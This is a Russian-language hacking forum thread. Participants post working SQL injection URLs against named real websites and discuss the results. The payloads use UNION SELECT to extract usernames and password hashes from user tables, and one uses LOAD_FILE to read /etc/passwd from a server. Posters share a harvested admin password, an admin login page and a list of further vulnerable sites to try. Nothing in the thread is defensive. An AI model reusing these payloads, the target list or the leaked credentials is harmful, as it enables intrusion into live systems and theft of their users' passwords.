SQL Инъекции

http://www.rleague.com/db/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

 

HTML:

http://www.saworship.com/article-page.php?ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*

 

http://jah.ru/foto/showphoto.php?photo=-99+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+user/*

 

http://mac.clanhalo.net/index.php?page=player_history&user_id=-6%20union%20select%201,concat(username,char(58),user_password)%20from%20phpbb_users/*

Только там пароли не полностью показываются

 

..

 

http://www.saworship.com/article-page.php?ID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100))/*


а че не до конца?)

 

Дракула жжет =)
даже инъекцию не сделал нормально =)

Польский язык не знаю..но остается ток в поле 3 подобрать логин с паролем =)

 

не освоил я пока все эти лоад файл и чары

 

http://www.avtorinok.ru/news/news_firms.php?id=-1+union+select+1,2,3,4,5,login,password,8,9+from+users/*

http://www.vw-club.lv/index.php?mnpg=1&subpg=2&month=11&year=-1+union+select+1,2,concat(username,char(58),password),4+from+user+limit+1,1/*

Пасс у Админа смешной )

 

http://notes.asdplus.ru/shop/
около 100юзеров

http://notes.asdplus.ru/shop/view.php?id=-1+union+select+1,2,3,4,5,6,7,name,9,10,11,12,13,14,email,nick,17,18,pass,20+from+users+limit+1,2/*

админку не нашел=\ пасс: 31415 логин: admin

 

Научился, сделал:

Что можно сделать ещё кроме database() user() ersion() и подобных ?

 

http://notes.asdplus.ru:2082/login/ тока логин и пасс не подходят

для начала вот зашиврованный пасс админа
http://pct.ru/news.htm?id=-1+union+select+1,2,3,4,user_password+from+phpbb_users+where+user_id=2/* также есть таблица users

 

Чтото не могу таблицу найти!

Здесь даже не пробовал!

Здесь есть пароль нет логина:

 

2Rebz

Да нет, это ты не сделал там нету таблицы admin.

http://www.aceton.pl/category.php?id=-1+union+select+1,2,3,4+from+admin/*

http://www.aceton.pl/category.php?id=-1+union+select+1,2,3,4+Rebz_lol/*

 

http://transatlas.com.ua/forum/index.php?mode=file&whichuser=-60+union+select+1,concat(id,char(58),pass,char(58),name),3,4,5,6%20,7,8,9,10,11,12,13,14,15,16,17,18+from+users+where+id=5/* Ig-FoX а это что тогда?

 

system_user() now() load_file() count(*)

 

Это нейм, но он для авторизацыи не используется! Для авторизыцыи используется другой. по сути логин но сгенерированый уже самим форумом!

 

http://www.perlovka.ru/shownews.php?op=show&n_id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+21,1/*

 

http://gramota.ru/idictation/idictation.php?id=-1+union+select+1,2,3,4,5/*
http://www.fondsk.ru/article.php?id=495+union+select+1,2,3,4,5,6,7,8,9,10,11/*
\\\\\
http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
http://www.kazsu.kz/main.aspx?id=471'
вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать
\\\\\
http://www.vesti7.ru/news?id=9671
http://www.nbu.com/news/read.php?id=935
эти очень похожи на инъекцию, но подобрать кол столбцов не получилось

 

"Ляпис Трубецкой"
http://www.lyapis.com/news_full.php?type=news&id=-99'+union+select+1,2,3,4,concat(login,0x3a,password)+from+users+limit+1,1/*